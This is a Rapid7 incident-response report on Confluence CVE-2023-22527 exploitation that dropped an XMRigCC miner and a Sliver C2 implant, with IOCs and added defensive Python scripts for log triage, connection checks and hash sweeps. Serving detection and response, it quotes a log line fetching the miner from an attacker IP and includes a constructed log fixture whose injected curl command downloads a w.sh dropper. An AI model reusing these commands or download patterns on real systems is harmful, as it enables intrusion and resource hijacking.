Last updated on Tuesday, February 27, 2024 17:16:10 GMT

*Rapid7 Incident Response consultants Noah Hemker and Tyler Starks, and malware analyst Tom Elkins, contributed analysis and insights to this blog.*

Rapid7 Incident Response was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions. Rapid7 identified evidence of exploitation of CVE-2023-22527 within the available Confluence logs. During the investigation, Rapid7 identified cryptomining software and a Sliver command and control (C2) payload on in-scope servers. Sliver is a modular C2 framework that provides adversary emulation capabilities for red teams; however, it is also frequently abused by threat actors. The Sliver payload was used to action subsequent threat actor objectives within the environment. Without proper security tooling to monitor system network traffic and firewall communications, this activity could have continued undetected, leading to further compromise.

Rapid7 customers

Rapid7 continuously monitors emerging threats to identify areas with new detection opportunities. The recent appearance of Sliver C2 malware prompted Rapid7 teams to conduct a thorough analysis of the techniques being utilized and the potential risks. Rapid7 InsightIDR has an alert rule, Suspicious Web Request - Possible Atlassian Confluence CVE-2023-22527 Exploitation, available to all IDR customers, covering use of text-inline.vm consistent with the CVE-2023-22527 vulnerability. A vulnerability check is also available for InsightVM and Nexpose customers. A Velociraptor artifact to hunt for evidence of Confluence CVE-2023-22527 exploitation is available on the Velociraptor Artifact Exchange here. Read Rapid7's blog on CVE-2023-22527.

Observed Attacker Behavior

Rapid7 IR began the investigation by triaging available forensic artifacts on the two affected publicly-facing Confluence servers. Both servers were running vulnerable Confluence software versions that were abused to obtain Remote Code Execution (RCE). Rapid7 reviewed the server access logs to identify suspicious POST requests consistent with known vulnerabilities, including CVE-2023-22527. This vulnerability is a critical OGNL injection flaw that abuses the text-inline.vm template component of Confluence by sending a modified POST request to the server.

Evidence showed multiple instances of exploitation of this CVE; however, the embedded command would not be visible in the standard header information logged within access logs. Packet capture (PCAP) was not available for review to identify the embedded commands, but the identified POST requests were consistent with exploitation of the CVE.
The following are a few examples of exploitation of the Confluence CVE found within the access logs:

Access.log entries
POST /template/aui/text-inline.vm HTTP/1.0 200 5961ms 7753 - Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
POST /template/aui/text-inline.vm HTTP/1.7750 - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
POST /template/aui/text-inline.vm HTTP/1.0 200 247ms 7749 - Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0

Evidence showed the execution of a curl command post-exploitation of the CVE, resulting in cryptomining malware being dropped on the system. The IP addresses associated with the malicious POST requests to the Confluence servers matched the IP addresses of the identified curl command. This indicates that the dropped cryptomining malware was directly tied to the Confluence CVE exploitation.
As a result of the executed curl command, the file w.sh was written to the /tmp/ directory on the system. This file is a bash script that enumerates the operating system, downloads the cryptomining installation file, and then executes the cryptomining binary. The bash script runs a wget command to download javs.tar.gz from the IP address 38.6.173[.]11 over port 80. This file was identified as XMRigCC cryptomining malware, which caused a spike in system resource utilization consistent with cryptomining activity. The service javasgs_miner.service was created on the system and set to run as root to ensure persistence.

[Figure: code snippet contained within w.sh defining the communication parameters for downloading and executing the XMRigCC binary.]

Rapid7 identified additional log evidence within Catalina.log that references the download of the above file inside an HTTP response header. Tomcat flagged this response header as 'invalid' because it contained characters that could not be correctly interpreted. Evidence confirmed the successful download and execution of the XMRigCC miner, so the Catalina log entry below may prove useful for analysts looking for additional proof of attempted or successful exploitation.

Catalina log entry
WARNING [http-nio-8090-exec-239 url: /rest/table-filter/.0/service/license; user: Redacted ] org.apache.coyote.http11.Http11Processor.prepareResponse The HTTP response header [X-Cmd-Response] with value [http://38.6.173.11/xmrigCC-3.4.0-linux-generic-static-amd64.tar.gz xmrigCC-3.4.0-linux-generic-static-amd64.tar.gz ...] has been removed from the response because it is invalid
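The two log sources described above (access.log POST requests to text-inline.vm, and the Catalina.log warning about a stripped X-Cmd-Response header) lend themselves to a simple offline triage script. The following is an added example written for this page, not tooling from the Rapid7 investigation. The sample log lines are constructed: the leading source-IP and timestamp fields are an assumed layout (the entries quoted above start at the request method, so the parser treats the IP as optional), the addresses are documentation ranges, and the Catalina thread/url fields are placeholders. It correlates each source IP that POSTed to text-inline.vm with any later GET from the same IP whose path or query mentions curl, which is the follow-on behaviour listed in this report's log-based IOC, and it extracts any URL that Tomcat logged inside a rejected X-Cmd-Response header.

```python
import re
from collections import defaultdict

TEXT_INLINE_PATH = "/template/aui/text-inline.vm"

# Constructed sample lines (not from the Rapid7 investigation). The source IP
# and timestamp prefix is an assumed layout; the request, status, timing and
# User-Agent portion mirrors the access.log entries quoted in the blog.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 [27/Feb/2024:10:01:02 +0000] POST /template/aui/text-inline.vm HTTP/1.0 200 5961ms 7753 - Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
203.0.113.10 [27/Feb/2024:10:01:05 +0000] GET /template/aui/text-inline.vm?cmd=curl%20http://198.51.100.7/w.sh HTTP/1.0 200 120ms 7754 - Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
198.51.100.42 [27/Feb/2024:10:02:00 +0000] GET /login.action HTTP/1.1 200 15ms 1204 - Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0
192.0.2.5 [27/Feb/2024:10:03:00 +0000] POST /template/aui/text-inline.vm HTTP/1.0 403 10ms 31 - curl/8.1.0
"""

# Constructed Catalina lines modelled on the warning quoted in the blog; the
# thread/url/user fields and the download host are placeholders.
SAMPLE_CATALINA_LOG = """\
WARNING [http-nio-8090-exec-239 url: /rest/table-filter/1.0/service/license; user: redacted ] org.apache.coyote.http11.Http11Processor.prepareResponse The HTTP response header [X-Cmd-Response] with value [http://198.51.100.7/xmrigCC-3.4.0-linux-generic-static-amd64.tar.gz xmrigCC-3.4.0-linux-generic-static-amd64.tar.gz ...] has been removed from the response because it is invalid
WARNING [http-nio-8090-exec-12 url: /rest/api/content; user: alice ] org.apache.coyote.http11.Http11Processor.prepareResponse The HTTP response header [X-Debug] with value [line1\\nline2] has been removed from the response because it is invalid
"""

# The source IP group is optional so that lines logged without it (as quoted
# in the blog) still parse; such records get ip == "unknown".
ACCESS_RE = re.compile(
    r"(?:(?P<ip>\d{1,3}(?:\.\d{1,3}){3}).*?)?"
    r"\b(?P<method>GET|POST)\s+(?P<path>\S+)\s+HTTP/\d\.\d\s+(?P<status>\d{3})\b"
)
CATALINA_HEADER_RE = re.compile(
    r"HTTP response header \[(?P<header>[^\]]+)\] with value \[(?P<value>.*?)\] has been removed"
)
URL_RE = re.compile(r"https?://[^\s\]]+", re.IGNORECASE)


def parse_access_line(line):
    """Return {'ip', 'method', 'path', 'status'} for a request line, else None."""
    m = ACCESS_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ip"] = rec["ip"] or "unknown"
    rec["status"] = int(rec["status"])
    return rec


def find_text_inline_exploitation(access_lines):
    """One finding per source IP that POSTed to text-inline.vm.

    Records the HTTP statuses of those POSTs (200 indicates the server
    processed the template) and whether the same IP later issued a GET whose
    path or query string contains 'curl', i.e. the follow-on download step.
    """
    post_statuses = defaultdict(list)   # ip -> [status, ...] in log order
    curl_follow_up = set()
    for line in access_lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].split("?", 1)[0] == TEXT_INLINE_PATH:
            post_statuses[rec["ip"]].append(rec["status"])
        elif rec["method"] == "GET" and rec["ip"] in post_statuses and "curl" in rec["path"].lower():
            curl_follow_up.add(rec["ip"])
    return [
        {
            "ip": ip,
            "post_statuses": statuses,
            "successful": 200 in statuses,
            "curl_followup": ip in curl_follow_up,
        }
        for ip, statuses in post_statuses.items()
    ]


def find_dropped_x_cmd_response(catalina_lines):
    """Extract the value (and any URLs in it) of X-Cmd-Response headers Tomcat rejected."""
    hits = []
    for line in catalina_lines:
        m = CATALINA_HEADER_RE.search(line)
        if not m or m.group("header").lower() != "x-cmd-response":
            continue
        value = m.group("value")
        hits.append({"value": value, "urls": URL_RE.findall(value)})
    return hits


if __name__ == "__main__":
    for f in find_text_inline_exploitation(SAMPLE_ACCESS_LOG.splitlines()):
        print("text-inline.vm POST from", f["ip"], "statuses", f["post_statuses"],
              "success" if f["successful"] else "no 200", "curl follow-up" if f["curl_followup"] else "")
    for h in find_dropped_x_cmd_response(SAMPLE_CATALINA_LOG.splitlines()):
        print("X-Cmd-Response stripped by Tomcat, URLs:", h["urls"])
```

Run it against the real access.log and catalina.out with `splitlines()` replaced by the file iterator. A 200 on the POST alone is not proof of command execution, which is why the script reports the curl follow-up separately; conversely the X-Cmd-Response warning is strong evidence that a command ran, because the header only exists when the injected payload wrote its output into the response.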

Rapid7 then shifted focus to a review of system network connections on both servers. Evidence showed an active connection from both servers to the known-abused IP address 193.29.13[.]179 over port 8888. netstat output showed that the program owning the network connection was named X-org and located in the system's /tmp directory. Per the firewall logs, the first identified communication from this server to the malicious IP address aligned with the creation timestamp of the identified X-org file. Rapid7 identified another malicious file residing on the secondary server, named X0. Both files shared the same SHA256 hash, indicating that they are the same binary. The hashes for these files are provided in the IOC section below.

A review of firewall logs provided a comprehensive view of the communications between the affected systems and the malicious IP address. Firewall logs filtered on traffic between the compromised servers and the malicious IP address showed inbound and outbound data transfers consistent with known C2 behavior. Rapid7 decoded and debugged the Sliver payload to extract any available indicators of compromise (IOCs). Within the Sliver payload, Rapid7 confirmed that the IP address 193.29.13[.]179 would be contacted over port 8888 using the mTLS transport, in which the implant and the C2 server authenticate each other with embedded client and server certificates.
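The netstat triage above (an established connection to 193.29.13[.]179:8888 owned by a binary in /tmp) can be reproduced without netstat by reading /proc/net/tcp directly, which is useful on a minimal container image or when the attacker has tampered with the usual tools. The following is an added example for this page, not Rapid7's tooling. The parsing of the hex-encoded /proc/net/tcp format is pure and is exercised on a constructed table below; the inode-to-process mapping and the temp-directory check only work on a live Linux host, and the sample local addresses and inode numbers are invented.

```python
import os
from pathlib import Path

TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # staging locations seen in this case
TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
              "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
              "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING"}

# Constructed /proc/net/tcp content (local addresses and inodes are invented).
# Row 1 is a local listener on 127.0.0.1:8080; row 2 is an ESTABLISHED
# connection from 10.0.2.15 to 193.29.13.179:8888 owned by uid 0.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:A3E4 B30D1DC1:22B8 01 00000000:00000000 00:00000000 00000000     0        0 67890 1 0000000000000000 20 4 30 10 -1
"""


def decode_addr(hex_addr):
    """'B30D1DC1:22B8' -> ('193.29.13.179', 8888).

    /proc/net/tcp stores the IPv4 address as a little-endian 32-bit value, so
    the octets are read from the last hex byte pair to the first.
    """
    ip_hex, port_hex = hex_addr.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0)]
    return ".".join(octets), int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse the /proc/net/tcp table into dicts with decoded endpoints."""
    rows = []
    for line in text.splitlines()[1:]:          # first line is the column header
        f = line.split()
        if len(f) < 10:
            continue
        local, remote = decode_addr(f[1]), decode_addr(f[2])
        rows.append({"local": local, "remote": remote,
                     "state": TCP_STATES.get(f[3], f[3]),
                     "uid": int(f[7]), "inode": int(f[9])})
    return rows


def find_c2_connections(text, remote_ips=(), remote_ports=()):
    """Rows whose remote endpoint matches a watched IP or port (e.g. the Sliver C2)."""
    return [r for r in parse_proc_net_tcp(text)
            if r["remote"][0] in remote_ips or r["remote"][1] in remote_ports]


def socket_owner(inode):
    """Map a socket inode to (pid, exe path) by scanning /proc/*/fd. Live host only."""
    target = f"socket:[{inode}]"
    for pid_dir in Path("/proc").glob("[0-9]*"):
        try:
            for fd in (pid_dir / "fd").iterdir():
                if os.readlink(fd) == target:
                    return int(pid_dir.name), os.readlink(pid_dir / "exe")
        except (PermissionError, FileNotFoundError):
            continue                              # not our process, or it exited
    return None


def runs_from_temp(exe_path):
    """True if the executable lives in a world-writable staging directory.

    readlink on /proc/<pid>/exe appends ' (deleted)' if the binary was removed
    after launch, which is itself suspicious, so a prefix test is used.
    """
    return any(exe_path.startswith(d + "/") for d in TEMP_DIRS)


if __name__ == "__main__":
    with open("/proc/net/tcp") as fh:
        live = fh.read()
    for row in find_c2_connections(live, remote_ips={"193.29.13.179"}, remote_ports={8888}):
        owner = socket_owner(row["inode"])
        flag = " <-- binary in temp dir" if owner and runs_from_temp(owner[1]) else ""
        print(row["local"], "->", row["remote"], row["state"], "uid", row["uid"], owner, flag)
```

Remember to repeat the scan on /proc/net/tcp6, and note that a port-8888 match alone is only a lead: Sliver's mTLS listener can be bound to any port, so the stronger signals are the remote address from the firewall logs and a connection owner whose executable sits in /tmp, /var/tmp or /dev/shm.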

After Sliver first communicated with the C2, it checked the username associated with the current session on the local system, read /etc/passwd and /etc/machine-id, and then communicated with the C2 again. The contents of passwd and machine-id provide system information such as the hostname and the accounts present on the system. Cached credentials from the system were found to be associated with outbound C2 traffic, further supporting this credential access. This activity is consistent with the standard capabilities available within the GitHub release of Sliver hosted here.

The Sliver C2 connection was later used to execute wget commands that downloaded Kerbrute, Traitor, and Fscan to the servers. Kerbrute was executed from /dev/shm and is commonly used to brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentication. The Traitor binary was executed from the /var/tmp directory and contains functionality to exploit Pwnkit and Dirty Pipe, as seen in evidence from the system. Fscan was executed from the /var/tmp directory under the file name f and performed scanning to enumerate systems present in the environment. Rapid7 performed containment measures to stop any further threat actor activity. No additional post-exploitation objectives were identified within the environment.

Mitigation guidance

To mitigate the attacker behavior outlined in this blog, the following mitigation techniques should be considered:

  • Ensure that unnecessary ports and services are disabled on publicly-facing servers.

  • All publicly-facing servers should regularly be patched and remain up-to-date with the most recent software releases.

  • Environment firewall logs should be aggregated into a centralized security solution to allow for the detection of abnormal network communications.

  • Firewall rules should be implemented to deny inbound and outbound traffic from unapproved geolocations.

  • Publicly-facing servers hosting web applications should implement a restricted shell, where possible, to limit the capabilities and scope of commands available when compared to a standard bash shell.

MITRE ATT&CK techniques

| Tactic | Technique | Details |
| --- | --- | --- |
| Command and Control | Application Layer Protocol (T1071) | Sliver C2 connection |
| Discovery | Account Discovery: Domain Account (T1087.002) | Kerbrute enumeration of Active Directory |
| Reconnaissance | Active Scanning (T1595) | Fscan enumeration |
| Privilege Escalation | Setuid and Setgid (T1548.001) | Traitor privilege escalation |
| Execution | Unix Shell (T1059.004) | Sliver payload and subsequent command execution |
| Credential Access | Brute Force (T1110) | Kerbrute Active Directory brute-force component |
| Credential Access | OS Credential Dumping: /etc/passwd and /etc/shadow (T1003.008) | Extraction of the contents of /etc/passwd |
| Impact | Resource Hijacking (T1496) | Execution of cryptomining software |
| Initial Access | Exploit Public-Facing Application (T1190) | Evidence of text-inline.vm abuse within Confluence logs |

Indicators of Compromise

| Attribute | Value | Description |
| --- | --- | --- |
| File name and path | /dev/shm/traitor-amd64 | Privilege escalation binary |
| SHA256 | fdfbfc07248c3359d9f1f536a406d4268f01ed63a856bd6cef9dccb3cf4f2376 | Hash of the Traitor binary |
| File name and path | /var/tmp/kerbrute_linux_amd64 | Kerbrute enumeration of Active Directory |
| SHA256 | 710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a | Hash of the Kerbrute binary |
| File name and path | /var/tmp/f | Fscan enumeration |
| SHA256 | b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59 | Hash of the Fscan binary |
| File name and path | /tmp/X0 | Sliver binary |
| SHA256 | 29bd4fa1fcf4e28816c59f9f6a248bedd7b9867a88350618115efb0ca867d736 | Hash of the Sliver binary |
| File name and path | /tmp/X-org | Sliver binary |
| SHA256 | 29bd4fa1fcf4e28816c59f9f6a248bedd7b9867a88350618115efb0ca867d736 | Hash of the Sliver binary |
| IP address | 193.29.13.179 | Sliver C2 IP address |
| File name and path | /tmp/w.sh | Bash script for the XMRigCC cryptominer |
| SHA256 | 8d7c5ab5b2cf475a0d94c2c7d82e1bbd8b506c9c80d5c991763ba6f61f1558b0 | Hash of the bash script |
| File name and path | /tmp/javs.tar.gz | Compressed cryptominer installation file |
| SHA256 | ef7c24494224a7f0c528edf7b27c942d18933d0fc775222dd5fffd8b6256736b | Hash of the cryptominer installation file |
| Log-based IOC | "POST /template/aui/text-inline.vm HTTP/1.0 200" followed by a GET request containing curl | Exploitation behavior within the Confluence access.log |
| IP address | 195.80.148.18 | IP address associated with the text-inline.vm exploitation and curl |
| IP address | 103.159.133.23 | IP address associated with the text-inline.vm exploitation and curl |
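The file-based indicators in the table above are all staged in world-writable directories (/tmp, /var/tmp, /dev/shm), which makes a targeted sweep cheap. The following is an added example for this page, not Rapid7's tooling: it walks those directories, hashes every regular file in chunks, and reports a match on either a SHA256 from the table or one of the file names. The `demo()` helper builds a throwaway directory with constructed files (a script named w.sh, a file whose hash is added to the IOC set for the demonstration, and a benign file) so the sweep can be exercised offline; nothing in that helper comes from the incident.

```python
import hashlib
import os
import tempfile

# SHA256 values and file names from the IOC table in this report.
IOC_SHA256 = {
    "fdfbfc07248c3359d9f1f536a406d4268f01ed63a856bd6cef9dccb3cf4f2376": "Traitor privilege escalation binary",
    "710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a": "Kerbrute binary",
    "b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59": "Fscan binary",
    "29bd4fa1fcf4e28816c59f9f6a248bedd7b9867a88350618115efb0ca867d736": "Sliver implant (X0 / X-org)",
    "8d7c5ab5b2cf475a0d94c2c7d82e1bbd8b506c9c80d5c991763ba6f61f1558b0": "w.sh XMRigCC dropper script",
    "ef7c24494224a7f0c528edf7b27c942d18933d0fc775222dd5fffd8b6256736b": "javs.tar.gz XMRigCC archive",
}
IOC_NAMES = {"traitor-amd64", "kerbrute_linux_amd64", "f", "X0", "X-org", "w.sh", "javs.tar.gz"}
SWEEP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA256 so large archives do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(dirs=SWEEP_DIRS, ioc_hashes=IOC_SHA256, ioc_names=IOC_NAMES):
    """Return one record per file in `dirs` matching an IOC hash or file name.

    A hash match is a strong indicator; a name-only match (e.g. a file simply
    called 'f') is a lead that needs a look at the content and the owning process.
    Symlinks and non-regular files (sockets in /dev/shm) are skipped.
    """
    matches = []
    for base in dirs:
        for root, _subdirs, files in os.walk(base):
            for name in files:
                path = os.path.join(root, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                reasons = []
                if name in ioc_names:
                    reasons.append("filename match")
                try:
                    digest = sha256_file(path)
                except OSError:
                    digest = None            # unreadable: the name check still applies
                if digest in ioc_hashes:
                    reasons.append("sha256: " + ioc_hashes[digest])
                if reasons:
                    matches.append({"path": path, "sha256": digest, "reasons": reasons})
    return matches


def demo():
    """Constructed offline demonstration; returns {basename: reasons}."""
    d = tempfile.mkdtemp(prefix="ioc-sweep-demo-")
    samples = {
        "w.sh": b"#!/bin/sh\necho constructed sample\n",   # name matches the IOC table
        "payload": b"constructed sample binary",            # hash added to the IOC set below
        "notes.txt": b"benign file",                        # should not be reported
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    hashes = dict(IOC_SHA256)
    hashes[hashlib.sha256(samples["payload"]).hexdigest()] = "constructed sample"
    return {os.path.basename(m["path"]): m["reasons"] for m in sweep(dirs=(d,), ioc_hashes=hashes)}


if __name__ == "__main__":
    for m in sweep():
        print(m["path"], m["sha256"], "; ".join(m["reasons"]))
```

Run it as root so that files dropped by the Confluence service account and by root-owned persistence (the miner service in this case) are both readable, and pair a hit with the process-ownership check from the network triage: a matching binary that has already been deleted from disk still shows up as `/tmp/X-org (deleted)` in /proc/<pid>/exe even though this sweep will no longer find it.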